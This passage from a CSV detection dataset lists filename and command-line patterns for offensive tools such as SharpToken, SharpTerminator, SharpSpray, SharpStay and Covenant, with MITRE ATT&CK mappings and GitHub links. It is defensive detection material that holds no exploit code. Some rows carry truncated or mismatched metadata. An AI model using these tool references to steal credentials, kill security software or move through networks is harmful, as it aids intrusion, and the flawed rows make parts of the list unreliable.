fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpSploit*","offensive_tool_keyword","SharpSploit","SharpSploitis a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1059 - T1027 - T1505","TA0002 - TA0003 - TA0008 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","1","N/A","N/A","10","1632","322","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" +"*SharpSploit.dll*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" +"*SharpSploitConsole_x*","offensive_tool_keyword","cobaltstrike","SharpCradle is a tool designed to help penetration testers or red teams download and execute .NET binaries into memory.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 
T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/SharpCradle","1","1","N/A","10","10","275","59","2020-12-30T17:15:51Z","2018-10-23T06:21:53Z" +"*SharpSploitDomainRecon*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SharpSploitDomainReconImpl*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SharpSplunkWhisperer2*","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - 
TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","9","3","239","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" +"*SharpSpoolTrigger.exe*","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","10","4","366","43","2023-08-19T22:45:20Z","2021-09-12T18:18:15Z" +"*SharpSpray*","offensive_tool_keyword","SharpSpray","This project is a C# port of my PowerSpray.ps1 script. SharpSpray a simple code set to perform a password spraying attack against all users of a domain using LDAP and is compatible with Cobalt Strike.","T1110 - T1558","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/jnqpblc/SharpSpray","1","1","N/A","N/A","2","176","36","2019-06-30T03:10:52Z","2019-03-04T17:14:07Z" +"*SharpSpray.exe *","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","0","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" +"*SharpSpray.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpSQLPwn*","offensive_tool_keyword","SharpSQLPwn","C# tool to identify and exploit weaknesses within MSSQL instances in Active Directory environments","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/lefayjey/SharpSQLPwn","1","1","N/A","N/A","1","74","15","2022-02-13T19:15:36Z","2022-01-20T19:58:07Z" +"*SharpSQLPwn.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpStay.csproj*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","1","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" +"*Sharpstay.exe *","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" +"*SharpStay.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - 
T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*SharpStay.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpStay.sln*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","1","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" +"*SharpStay-master*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","1","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" +"*Sharp-Suite.git*","offensive_tool_keyword","Sharp-Suite","C# offensive tools","T1027 - T1059.001 - 
T1562.001 - T1136.001","TA0004 - TA0005 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite","1","0","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*SharpSvc.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpSword.csproj*","offensive_tool_keyword","SharpSword","Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly","T1562.004 - T1059.001 - T1021.003","TA0005 - TA0002","N/A","N/A","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","8","10","110","13","2023-08-22T20:16:28Z","2021-07-15T14:50:05Z" +"*SharpSword.exe*","offensive_tool_keyword","cobaltstrike","Read the contents of DOCX files using Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - 
T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","10","10","110","13","2023-08-22T20:16:28Z","2021-07-15T14:50:05Z" +"*SharpSword.exe*","offensive_tool_keyword","SharpSword","Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly","T1562.004 - T1059.001 - T1021.003","TA0005 - TA0002","N/A","N/A","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","8","10","110","13","2023-08-22T20:16:28Z","2021-07-15T14:50:05Z" +"*SharpSword.sln*","offensive_tool_keyword","SharpSword","Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly","T1562.004 - T1059.001 - T1021.003","TA0005 - TA0002","N/A","N/A","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","8","10","110","13","2023-08-22T20:16:28Z","2021-07-15T14:50:05Z" +"*SharpSword-main.*","offensive_tool_keyword","SharpSword","Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly","T1562.004 - T1059.001 - T1021.003","TA0005 - TA0002","N/A","N/A","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","8","10","110","13","2023-08-22T20:16:28Z","2021-07-15T14:50:05Z" +"*SharpSystemTriggers.git*","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","10","4","366","43","2023-08-19T22:45:20Z","2021-09-12T18:18:15Z" +"*SharpSystemTriggers.sln*","offensive_tool_keyword","SharpSystemTriggers","Collection of 
remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","10","4","366","43","2023-08-19T22:45:20Z","2021-09-12T18:18:15Z" +"*SharpSystemTriggers-main*","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","10","4","366","43","2023-08-19T22:45:20Z","2021-09-12T18:18:15Z" +"*SharpTask.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*sharptelnet *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*SharpTemplateResources/cmd/*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1099","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*SharpTerminator.exe*","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - 
TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","3","266","53","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" +"*SharpTerminator.git*","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","3","266","53","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" +"*SharpTerminator.sln*","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","3","266","53","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" +"*SharpTerminator-main.zip*","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","3","266","53","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" +"*SharpToken* add_user*","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","4","353","47","2023-04-11T13:29:23Z","2022-06-30T07:34:57Z" +"*SharpToken* delete_user*","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. 
It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","4","353","47","2023-04-11T13:29:23Z","2022-06-30T07:34:57Z" +"*SharpToken* enableUser *","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","4","353","47","2023-04-11T13:29:23Z","2022-06-30T07:34:57Z" +"*SharpToken* list_token*","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","4","353","47","2023-04-11T13:29:23Z","2022-06-30T07:34:57Z" +"*SharpToken* tscon *","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","4","353","47","2023-04-11T13:29:23Z","2022-06-30T07:34:57Z" +"*SharpToken.csproj*","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. 
It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","1","N/A","N/A","4","353","47","2023-04-11T13:29:23Z","2022-06-30T07:34:57Z" +"*SharpToken.exe*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1192","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" +"*SharpToken.exe*","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","1","N/A","N/A","4","353","47","2023-04-11T13:29:23Z","2022-06-30T07:34:57Z" +"*SharpToken.git*","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","1","N/A","N/A","4","353","47","2023-04-11T13:29:23Z","2022-06-30T07:34:57Z" +"*SharpToken-main.zip*","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. 
It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","1","N/A","N/A","4","353","47","2023-04-11T13:29:23Z","2022-06-30T07:34:57Z" +"*SharpUnhooker.*","offensive_tool_keyword","SharpUnhooker","C# Based Universal API Unhooker","T1055.012 - T1070.004 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GetRektBoy724/SharpUnhooker","1","1","N/A","9","4","365","103","2022-02-18T13:11:11Z","2021-05-17T01:33:38Z" +"*SharpUnhooker-main*","offensive_tool_keyword","SharpUnhooker","C# Based Universal API Unhooker","T1055.012 - T1070.004 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GetRektBoy724/SharpUnhooker","1","1","N/A","9","4","365","103","2022-02-18T13:11:11Z","2021-05-17T01:33:38Z" +"*SharpUp audit*","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*SharpUp*","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1057 - T1086 - T1059 - T1068","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/GhostPack/SharpUp","1","1","N/A","N/A","10","1022","222","2022-08-21T22:26:04Z","2018-07-24T17:39:33Z" +"*SharpUp.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpUpManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SharpUpMenu(*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SharpView.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpView.exe*","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","1","N/A","10","9","850","206","2021-12-17T15:53:20Z","2018-07-24T21:15:04Z" +"*SharpView\SharpView*","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","0","N/A","10","9","850","206","2021-12-17T15:53:20Z","2018-07-24T21:15:04Z" +"*SharpView-master*","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - 